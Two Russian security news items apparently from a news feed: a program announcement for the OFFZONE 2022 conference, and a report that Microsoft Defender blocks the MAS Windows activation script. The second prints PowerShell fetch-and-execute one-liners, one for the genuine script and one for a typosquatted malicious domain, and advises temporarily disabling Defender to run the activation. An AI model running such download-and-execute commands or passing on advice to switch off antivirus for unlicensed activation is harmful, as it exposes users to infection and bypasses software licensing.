Доступна полная программа OFFZONE 2022

Доступна полная программа OFFZONE 2022

Доступна полная программа OFFZONE 2022

25 и 26 августа в Москве пройдет конференция по практической кибербезопасности OFFZONE 2022. В этом году гостей ждут 2 трека, 3 тематические зоны, 58 докладов и 3 воркшопа. В программе — технический контент и исследования лучших экспертов по борьбе с киберугрозами.

Конференцию откроет keynote-спикер Дмитрий Евдокимов, основатель и технический директор компании Luntry. На главном треке спикер расскажет, как меняется ландшафт информационных систем и как это сказывается на обеспечении их безопасности.

Другие эксперты затронут широкий перечень тем: повышение привилегий на устройствах Apple, обзор APT-атак, сетевые атаки на протоколы FHRP, истории из практики пентестов и многое другое.

Визитная карточка OFFZONE — бейдж. Это не просто пластик со штрихкодом, а настоящая печатная плата с питанием, светодиодами и платежной системой для внутренней валюты конференции — очков Offcoin.

Вот что еще ждет гостей OFFZONE 2022.

Релиз платформы BI.ZONE Bug Bounty. Он состоится в первый день конференции — 25 августа, в 13.00. Команда BI.ZONE продемонстрирует интерфейс платформы, расскажет, для каких компаний предназначен продукт и объяснит, как будет выглядеть процесс получения вознаграждений для багхантеров.

Короткие обзоры интересных уязвимостей и защитных мер. Речь о Track 2, который пройдет параллельно с основным треком. Здесь можно будет посетить получасовые и даже 15-минутные доклады на актуальные темы про взломы.

Прикладные воркшопы. Один платный и два бесплатных: первый будет посвящен эксплуатации ядра Linux, второй — использованию стандартных утилит (LOLBAS) и легитимных приложений для атак, третий — определению уязвимостей в парсерах изображений.

AppSec.Zone. Здесь расскажут, как ломать и защищать приложения. Секция будет интересна тем, кто любит необычные баги или участвует в bug bounty.

Finance.Zone. Эта секция посвящена безопасности финансовых систем и банковской инфраструктуры.

DC&HW.Zone. Зона, где эксперты по железу и участники сообществ DEF CON будут делиться опытом.

CTFZone 2022. Международные соревнования по практической кибербезопасности. На OFFZONE это отдельный ежегодный ивент со своими призами, который проходит с 2016 года. Участники регистрировались заранее.

Jock Wars. Еще одна соревновательная активность, битва между программами в компьютерной сети. Участники будут создавать ботов и загружать их в игру, чтобы сразиться с другими участниками за место в общем рейтинге.

HACK in 15 min. Активность, где нужно успеть проявить себя и решить задачу по взлому за 10 минут. Срок можно продлить до 15 минут, но с игровым штрафом. 

Craft.Zone. Любимая многими зона, в которой гостям помогут изготовить свое устройство с помощью паяльника и припоя. 

Tattoo.Zone. Пространство, где каждый может почувствовать себя тату-мастером и даже набить настоящую татуировку на память. 

Собственные конкурсы, квизы и турниры приготовили партнеры конференции — Positive Technologies, Angara Security, Сбер, «РТК-Солар», Kaspersky, DeteAct, Swordfish Security, Servicepipe, «Совкомбанк Технологии» и другие компании.

Подробная программа OFFZONE 2022 опубликована на официальном сайте конференции.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru